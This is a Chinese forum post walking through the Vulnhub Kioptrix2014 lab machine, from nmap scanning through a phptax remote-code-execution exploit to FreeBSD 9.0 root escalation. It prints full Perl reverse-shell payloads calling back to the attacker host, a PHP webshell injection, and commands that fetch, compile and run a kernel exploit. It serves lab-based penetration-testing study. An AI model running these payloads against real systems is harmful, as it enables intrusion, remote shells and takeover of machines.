ToB企服应用市场:ToB评测及商务社交产业平台

标题: Vulnhub-kioptix2014靶机getshell及提权 [打印本页]
作者: 傲渊山岳    时间: 2025-2-20 10:38
标题: Vulnhub-kioptix2014靶机getshell及提权
靶机搭建

点击扫描虚拟机

然后扫描文件夹即可
<img alt="" loading="lazy">

信息网络

扫描ip

nmap扫描得到目的靶机ip
  1. nmap -sn 192.168.108.0/24
复制代码

  1. 攻击机:192.168.108.130
  2. 目标靶机:192.168.108.140
复制代码
扫端口和服务信息

扫描开放端口信息
  1. nmap -p 1-65535 192.168.108.140
复制代码

可用信息
  1. 22/tcp   closed ssh            #ssh服务
  2. 80/tcp   open   http           #Web网站
  3. 8080/tcp open   http-proxy     #HTTP代理或备用Web端口
复制代码
扫描服务信息
  1. nmap -sV 192.168.108.140
复制代码

可用信息
  1. 22/tcp   closed ssh
  2. 80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
  3. 8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
复制代码
指纹探测

执行以下命令
  1. nmap 192.168.108.140 -p 22,80,8080 -sV -sC -O --version-all
复制代码

寻找攻击点并攻击

信息探测

访问8080端口,拒绝访问

访问80端口,在源码处发现该提示

访问该页面  http://192.168.108.140/pChart2.1.3/examples/index.php

根据提示应该与pChart2.1.3有关,查找该漏洞

参考文章:https://vk9-sec.com/exploiting-pchart-2-1-3-directory-traversal-xss/
漏洞利用

两个可用信息,逐一访问试试

可以正常访问

再看看设置文件,Apache HTTP 服务器的主设置文件安装为 /usr/local/etc/apache2x/httpd.conf,其中 x 表示版本号,可以看到需要访问8080端口,且浏览器代理为Mozilla/4.0才可以

访问8080端口,只有一个跳转链接,访问试试

随便点击看看,没有什么有用信息

根据phptax查找漏洞利用,发现一个利用脚本
  1. https://github.com/NHPT/phptaxExploit
复制代码

在kali下载下来利用

反弹shell

开启一个监听端口  nc -lvvp 4444,成功反弹
  1. python3 phptax_exp.py -u http://192.168.108.140:8080/phptax -e perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.108.130%22%3B%24p%3D4444%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27
  2. perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.108.130%22%3B%24p%3D4444%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27
复制代码

其他方法

方法1

本靶机还可以利用其它方法毗连,检察phptax漏洞,有两个远程命令执行漏洞

下载下来检察
  1. searchsploit -m 21665.txt
  2. searchsploit -m 25849.txt
复制代码
先看25849.txt,有两处利用方式
  1. url/index.php?field=rce.php&newvalue=<?php passthru($_GET[cmd]);?>
  2. url/data/rce.php?cmd=id
复制代码
执行完成之后访问

然后反弹shell
  1. http://192.168.108.140:8080/phptax/data/rce.php?cmd=perl -e 'use Socket;$i="$ENV{192.168.108.130}";$p=$ENV{4444};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
复制代码
kali监听即可
方法2

再看21665.txt,存在漏洞利用方式

解码看看

利用方式,同样kali监听即可
  1. http://192.168.108.140:8080/phptax/drawimage.php?pfilez=xxx;perl -e 'use Socket;$i="$ENV{192.168.108.130}";$p=$ENV{4444};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';&pdf=make
复制代码
提权

检察靶机信息,该用户为www,且系统内核为FreeBSD 9.0
  1. uname -a:输出有关系统的详细信息,包括内核版本、主机名、操作系统类型和架构等
复制代码

检察历史漏洞

该靶机没有wget命令

网上查找下载方式

下载exp脚本到本地
  1. searchsploit FreeBSD 9.0 -m 26368.c
  2. searchsploit FreeBSD 9.0 -m 28718.c
复制代码

开启web服务
  1. python -m http.server 80
复制代码
下载exp
  1. fetch http://192.168.108.130/26368.c
  2. gcc 26368.c -o 26368
  3. chmod 777 26368
  4. ./26368
复制代码
下载成功并编译

添加权限并执行

提权成功

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4